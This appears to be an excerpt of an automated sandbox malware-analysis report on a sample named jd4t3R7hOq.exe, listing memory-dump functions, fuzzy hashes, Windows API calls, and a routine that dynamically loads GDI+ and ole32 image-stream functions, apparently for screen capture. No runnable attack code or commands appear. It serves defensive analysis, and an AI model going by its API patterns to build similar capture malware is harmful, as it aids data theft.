Source File: 00000003.00000002.2533393317.0000000001A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_jd4t3R7hOq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 19b99048047dc55f2829185e7364975739afcd1b008665ef6c7cad88264a2396
Instruction ID: 3c5ae0ac026c9353f608d8317770838f2a662e9cec24b8d5d7c9caf36a5331a2
Opcode Fuzzy Hash: 19b99048047dc55f2829185e7364975739afcd1b008665ef6c7cad88264a2396
Instruction Fuzzy Hash: 917137B0A00B058FD724EF29D54575ABBF1FF88304F10892EE54ADBA50D775E849CB91

Function 01A84248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01A859C9

Memory Dump Source

Source File: 00000003.00000002.2533393317.0000000001A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_jd4t3R7hOq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d423602c94184ee594e75760436d9bff50f0734d69edaf7730b52a7c8171bc6d
Instruction ID: 2e872557a552f5287c984087e0d3fe28cc54b4953f982d6e8d9643b7f461a293
Opcode Fuzzy Hash: d423602c94184ee594e75760436d9bff50f0734d69edaf7730b52a7c8171bc6d
Instruction Fuzzy Hash: BB41CFB0C00719DBDB24DFAAC984B9DBBB5BF49304F20806AD808AB255DB756946CF90

Function 01A8590D Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01A859C9

Memory Dump Source

Source File: 00000003.00000002.2533393317.0000000001A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_jd4t3R7hOq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f6008a3e4acd4a3dff667871184dba3090cc4f481f4d79b9982ab8b521fc0371
Instruction ID: 3e4d09e2a3130b0b0f157ba8187c38efb0419a71ce301bd028e0ab5a0d819cfd
Opcode Fuzzy Hash: f6008a3e4acd4a3dff667871184dba3090cc4f481f4d79b9982ab8b521fc0371
Instruction Fuzzy Hash: E441C1B1C00719CBDB24DFAAC98478DFBF5BF49304F24806AD848AB255DB756946CF90

Function 01A8B730 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01A8D5E6,?,?,?,?,?), ref: 01A8D6A7

Memory Dump Source

Source File: 00000003.00000002.2533393317.0000000001A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_jd4t3R7hOq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4c80eb6c8d661af507066d12317e3f89cbdb2106ddbcea5ff4824123c2f744df
Instruction ID: c335460345aee22b92057cc963c720c69bd9e2ff7722b3ba8d396a8bf4b051b2
Opcode Fuzzy Hash: 4c80eb6c8d661af507066d12317e3f89cbdb2106ddbcea5ff4824123c2f744df
Instruction Fuzzy Hash: 7221E3B5900209AFDB10DFAAD984ADEBBF4EB48310F14842AE958A7350D375A944CFA4

Function 01A8D619 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01A8D5E6,?,?,?,?,?), ref: 01A8D6A7

Memory Dump Source

Source File: 00000003.00000002.2533393317.0000000001A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_jd4t3R7hOq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4860813e5ee4228e2abbbdcbd05ddf1f8682d8395c4a4dfc38e265432a001169
Instruction ID: 1b45641568dd7eb82698f99aed676fba93ca0900121c2d5007bf68d00fd775f7
Opcode Fuzzy Hash: 4860813e5ee4228e2abbbdcbd05ddf1f8682d8395c4a4dfc38e265432a001169
Instruction Fuzzy Hash: DA2100B5D002099FDB10CFAAD584AEEBBF4FB48310F14842AE918A3250C378A940CFA0

Function 066819DA Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowTextW.USER32(?,00000000), ref: 06681A4A

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: cd6e0cad33501e8afeb000064e1b3561b4bac90374ac1cc184755f6f30ad1467
Instruction ID: 400d89beade7c17ae445903415959a829be76e66992bcee2f38355c497a70539
Opcode Fuzzy Hash: cd6e0cad33501e8afeb000064e1b3561b4bac90374ac1cc184755f6f30ad1467
Instruction Fuzzy Hash: 3B1114B6D0020A8FDB14DFAAC544BDEFBF4AB48310F14C51AD858B3250D739A549CFA4

Function 066819E0 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowTextW.USER32(?,00000000), ref: 06681A4A

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: d73cc4b96b1fbbb9e892b6022fd24640c7a9db615bd36a25e99ca05b2c362480
Instruction ID: cb48d2cde87a2483878a86a5f22e382b1fd3347f800951a7b28fc5857c0e4e19
Opcode Fuzzy Hash: d73cc4b96b1fbbb9e892b6022fd24640c7a9db615bd36a25e99ca05b2c362480
Instruction Fuzzy Hash: E11126B6C0020A8FDB14DFAAC544BDEFBF4EB49310F10842AD858B3240D739A549CFA5

Function 06685720 Relevance: 1.5, APIs: 1, Instructions: 48
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 0668577D

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b66e197656563ad537ee9c5d6d6a741aae64f4ba04a6f133a1e9bcaa0a8a8e51
Instruction ID: 0db1074bda0a6d00cc10923b9dc9cec552af91777de89206dea4ee948fd2ff7d
Opcode Fuzzy Hash: b66e197656563ad537ee9c5d6d6a741aae64f4ba04a6f133a1e9bcaa0a8a8e51
Instruction Fuzzy Hash: 7C1148B5800309DFDB50DF9AC985BDEFBF8EB48320F108419E558A3240D379A544CFA1

Function 06680514 Relevance: 1.5, APIs: 1, Instructions: 47
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageW.USER32(?,00000018,00000001,?), ref: 0668201D

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 70787071fdb036bbd3990693a6d74f55135d1bb32c706d95dbabcc237158b412
Instruction ID: 7f02519bc56521a338db58244521fd86eb2f81482d12435a67cd84e2300e84ec
Opcode Fuzzy Hash: 70787071fdb036bbd3990693a6d74f55135d1bb32c706d95dbabcc237158b412
Instruction Fuzzy Hash: 1211F5B58003499FDB60DF99D989BDEBBF8EB48310F108459E558A7200C375A944CFE1

Function 01A8AF38 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01A8AF9E

Memory Dump Source

Source File: 00000003.00000002.2533393317.0000000001A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_jd4t3R7hOq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a14ccc296e6e1a1e3495fe0426303a0997a7f2f53ee74767dab4cfd919da904d
Instruction ID: cfa99c8a1cdc365328c1d26e703fa0cc497924bca6ab8cd881420b13160fd09c
Opcode Fuzzy Hash: a14ccc296e6e1a1e3495fe0426303a0997a7f2f53ee74767dab4cfd919da904d
Instruction Fuzzy Hash: 39110FB6C002498FDB20DF9AD544ADEFBF4AF88314F10841AD828A7240C379A545CFA1

Function 0668571F Relevance: 1.5, APIs: 1, Instructions: 46
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 0668577D

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e1ec5eb7a2e5df41ebd6f8a50ba9af2e36ed40ff2b7d557f6354dfcdf81e49f5
Instruction ID: d25d2ebbbf9d91c8cf4f623ba87c3406ecb73698cb3e2a1b38365d881292fc3c
Opcode Fuzzy Hash: e1ec5eb7a2e5df41ebd6f8a50ba9af2e36ed40ff2b7d557f6354dfcdf81e49f5
Instruction Fuzzy Hash: E31106B6800309DFDB50DF99D985BEEBBF4EB08310F14845AD558B3650D379A544CFA1

Function 0668E470 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0668EB47), ref: 0668F5E5

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 0c11b6c0abe2fa6c27dbe35777dc80477501eed5c1f4d372c2b29281e558fa85
Instruction ID: b66ae30b9fbca576480e437950c1bbf584da050e7d220422880a14599aaa4bf3
Opcode Fuzzy Hash: 0c11b6c0abe2fa6c27dbe35777dc80477501eed5c1f4d372c2b29281e558fa85
Instruction Fuzzy Hash: E9111DB1C043499FCB60EFAAD544A9EFBF4EB48310F10856AE828A3200D379A544CFA5

Function 0668F580 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0668EB47), ref: 0668F5E5

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 0b5cbfe911a13a6d3be516d27e44cd3b4091b27a96c7424d88d26e13b9b918e7
Instruction ID: b24433a1c726c33cf926481c3e8c6ae2185ea20922b0758e13b6534459d7340d
Opcode Fuzzy Hash: 0b5cbfe911a13a6d3be516d27e44cd3b4091b27a96c7424d88d26e13b9b918e7
Instruction Fuzzy Hash: C0112EB5C003499FCB20DFAAE844BCEBBF4EB48320F10851AE468B7200D379A544CFA1

Function 066859D8 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 066870BD

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: a58bec578f2879cb44f8acfd3bb6017fb96a6e15ec941f594d1e7e63a14a0c5b
Instruction ID: c2bb090e32095e6194b75552a67e9a384cd65156b2216c812bd4ce3f32f7dfa0
Opcode Fuzzy Hash: a58bec578f2879cb44f8acfd3bb6017fb96a6e15ec941f594d1e7e63a14a0c5b
Instruction Fuzzy Hash: E31133B18003089FCB60EFAAD584B9EBFF4EB48310F208559D518A3300D375A944CFE5

Function 06681FBA Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000018,00000001,?), ref: 0668201D

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8a1480be39148fd6ac08d390a48added3ccc2c683de57bc32cee7b4346e53ff0
Instruction ID: 14f440182819f839e5f34d04321c4156d696db3dceac21203a933ed8cd3b23db
Opcode Fuzzy Hash: 8a1480be39148fd6ac08d390a48added3ccc2c683de57bc32cee7b4346e53ff0
Instruction Fuzzy Hash: 251103B68003099FCB50DF99D999BDEBBF8EB08320F10851AD558B7340C375A684CFA0

Function 06683BE0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 06683C3D

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f8bea260ac142745abea4d3f50e6154af53e71b09239a831fda74129877d392b
Instruction ID: 02bb41980d406fc428a7ba9e2bc9d60b0cca3fc0856ece2f1b62d3cb20b3169c
Opcode Fuzzy Hash: f8bea260ac142745abea4d3f50e6154af53e71b09239a831fda74129877d392b
Instruction Fuzzy Hash: 0E11D0B58003499FDB60DF9AD985BDEBBF8EB48320F10845AE558B7300C375A944CFA1

Function 06683BDF Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 06683C3D

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 87de365757dabcdea88a7625c822fe682d20f41ad51808e74b2c9c59ca6fbdb4
Instruction ID: befc45e06d468eb3128b472797bad1e9ee644727c154d306dac6f5fd2e2ba2c7
Opcode Fuzzy Hash: 87de365757dabcdea88a7625c822fe682d20f41ad51808e74b2c9c59ca6fbdb4
Instruction Fuzzy Hash: 7E11D0B68003499FDB50DF99D985BDEBBF8EB48310F10845AD558B7300C375A544CFA1

Function 06687067 Relevance: 1.5, APIs: 1, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 066870BD

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 1d1e7876f33b3bf73cca86ae96f967a48d24070982aa970ecb01df123b64a152
Instruction ID: c504ca21b4f7fa064449a249af76f1d577b93e4707b41e2d7be232327c862e89
Opcode Fuzzy Hash: 1d1e7876f33b3bf73cca86ae96f967a48d24070982aa970ecb01df123b64a152
Instruction Fuzzy Hash: 2D111EB5C003098FCB60EFA9D689B9EBBF4AB08320F20855AD558B3300C379A544CFA5

Function 015ED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2530470230.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_15ed000_jd4t3R7hOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5198c4ec0cd741301ecafabad3c002407c444cf901a51bb7687c77e1871af509
Instruction ID: 2778b9eeda1b48eaf039e9ecf1681c1a1e5be7011d926a79fb9b3225ee0c393b
Opcode Fuzzy Hash: 5198c4ec0cd741301ecafabad3c002407c444cf901a51bb7687c77e1871af509
Instruction Fuzzy Hash: 41210075A04204DFCB19DF58D988B26BFF5FB88314F28C969E80A0F256D33AD406CA61

Function 015ED2BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2530470230.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_15ed000_jd4t3R7hOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4450cb24670a2a3dbe5f0b28b12498d044cc9edbdac350cc9cef27e47a82269c
Instruction ID: 4f43676380069a648d876babbe832c5f81787c13776f3ce500467eb1432566d3
Opcode Fuzzy Hash: 4450cb24670a2a3dbe5f0b28b12498d044cc9edbdac350cc9cef27e47a82269c
Instruction Fuzzy Hash: F42108B5904244DFDB09DF58D5C8B2ABBF5FB88324F24C569E8490F286C37AD406CAA1

Function 015ED006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2530470230.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_15ed000_jd4t3R7hOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1745d7373ebae2f784dcc9d910ab9ced040784e96d111d63230dfd9a44dbd175
Instruction ID: 2eb9d2997e66802abbb0c94a8e8da2b7ffbdd9aa85bd75159e4e98aa68d70f2b
Opcode Fuzzy Hash: 1745d7373ebae2f784dcc9d910ab9ced040784e96d111d63230dfd9a44dbd175
Instruction Fuzzy Hash: 60219F755093808FDB07CF24D994715BFB1FB46214F29C5EAD8498F2A7D33A980ACB62

Function 015ED2B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2530470230.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_15ed000_jd4t3R7hOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c97d5b1cbfc5ae5835a6066c3a266f817fddfa279b37b7c916b6a5cfd3dcaf6
Instruction ID: 199f9d25563fd83b4bc20f65d1f2cb85042bfe6f53f35cec5ce2dc500858e4da
Opcode Fuzzy Hash: 6c97d5b1cbfc5ae5835a6066c3a266f817fddfa279b37b7c916b6a5cfd3dcaf6
Instruction Fuzzy Hash: 1711B275904284CFDB16CF14D5C4B19FFB1FB88324F24C6A9D8494B656C33AD40ACB91

Function 078E04AA Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2558541540.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_78e0000_jd4t3R7hOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1551180abd97646f0c46e3f096bb82b1fa2b19bfe141acbb33d6602a55291710
Instruction ID: 1fbe3f83087dfead8b0b146527631c7b6a4a15b1fa79c535e4223e23ea2f211e
Opcode Fuzzy Hash: 1551180abd97646f0c46e3f096bb82b1fa2b19bfe141acbb33d6602a55291710
Instruction Fuzzy Hash: F0E0EDB094011ACBDB349F10CD59BADB775BB56308F2149DAC556F6291CBB41984CF40

Non-executed Functions

Function 01A8D304 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2533393317.0000000001A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_jd4t3R7hOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0676d6517809a382e2adc4b1703dbf1f5f34db62b48abf1f2714f7df6d5e416
Instruction ID: ebf1d3358e9b894f311096522a98958abf6583d8628c6294cd843022c0f8df65
Opcode Fuzzy Hash: b0676d6517809a382e2adc4b1703dbf1f5f34db62b48abf1f2714f7df6d5e416
Instruction Fuzzy Hash: 2FA18236E00206CFCF15EFB4C94459EBBB2FF85300B15456AE905AB265EB31E916CB50

Analysis Process: powershell.exePID: 7672, Parent PID: 7572COMMON

Executed Functions

Function 04636C62 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1316366810.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ee7ff2787991c8d3d48c95a52271899bdb7e97f7931938d97044092157af688
Instruction ID: 39c38e58c0ae3ea67b2b261d3a671bcadd3d00b8d3aebb3451c9805d2b9978db
Opcode Fuzzy Hash: 1ee7ff2787991c8d3d48c95a52271899bdb7e97f7931938d97044092157af688
Instruction Fuzzy Hash: 5A515E74A05248EFCB05CFA5D5809EDBBF2FF89301F1480AAE844AB362D735AD46DB50

Function 046329F0 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1316366810.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f70d86e7deb8831aca5ea7b2496bb5c9f2d029c9313371c23b5a736d83845ba6
Instruction ID: 173c4a9e2f60ad2357aefeec048b4ac9b9d58dce5ad5f4ca7cdf8924bdb8b4cb
Opcode Fuzzy Hash: f70d86e7deb8831aca5ea7b2496bb5c9f2d029c9313371c23b5a736d83845ba6
Instruction Fuzzy Hash: AD91AC74A002459FCB15CF58C4A49BEFBB1FF88310B24859AD916AB3A5D736FC51CBA0

Function 04632B00 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1316366810.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79cde65dbee13ddc551077cee5f61e85c9764b9b7bf574ee842dc86af2acbb74
Instruction ID: 5b16c14ad84da6a0deca923ebdf312d3de11f3175b407723920664f582be96ac
Opcode Fuzzy Hash: 79cde65dbee13ddc551077cee5f61e85c9764b9b7bf574ee842dc86af2acbb74
Instruction Fuzzy Hash: C24169B4A001058FCB09CF49C198ABAF7B1FF48710B218599D916AB364D732FC51CB90

Function 045CD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1316101512.00000000045CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45cd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ed2b77152e6d97698b0abf37bdb3192b06f722351d8cff1bbdf1ae086b9c256
Instruction ID: 644f4ad9061d673831c1ee60bb23811068dfe0024d4d32a2866d9ebf7ea18e22
Opcode Fuzzy Hash: 6ed2b77152e6d97698b0abf37bdb3192b06f722351d8cff1bbdf1ae086b9c256
Instruction Fuzzy Hash: 1D01F7711053009ED7208F5EED84B67BFE8FF41320F08C83DED09AA146E279A84AD6B1

Function 045CD005 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1316101512.00000000045CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45cd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bc86af94ec8551f074c77a8c052b1bca677c6d58bd9d178b9439caefb1b8a4f
Instruction ID: bc38e4a8920dbb8c6da6267ab231ea73f7f934ec053e0bdfa284427ae885f6d8
Opcode Fuzzy Hash: 4bc86af94ec8551f074c77a8c052b1bca677c6d58bd9d178b9439caefb1b8a4f
Instruction Fuzzy Hash: 3201806100E3C05FD7128B259C94A62BFB4EF43224F1DC4DBD8889F193D2699848C772

Analysis Process: jd4t3R7hOq.exePID: 7816, Parent PID: 7572COMMON

Execution Graph

Execution Coverage:	19.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	9

Executed Functions

Function 00417B1A Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 00417B33
GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417B39
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B4D
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B53
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B67
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B6D
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B81
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B87
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B9B
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BA1
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 00417BB5
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BBB
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 00417BCF
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BD5
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 00417BE9
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BEF
LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 00417C03
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C09
LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417C1D
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C23

Strings

GdipCreateBitmapFromHBITMAP, xrefs: 00417B77
GetHGlobalFromStream, xrefs: 00417C13
wcscmp, xrefs: 00417B29
GdipSaveImageToStream, xrefs: 00417BDF
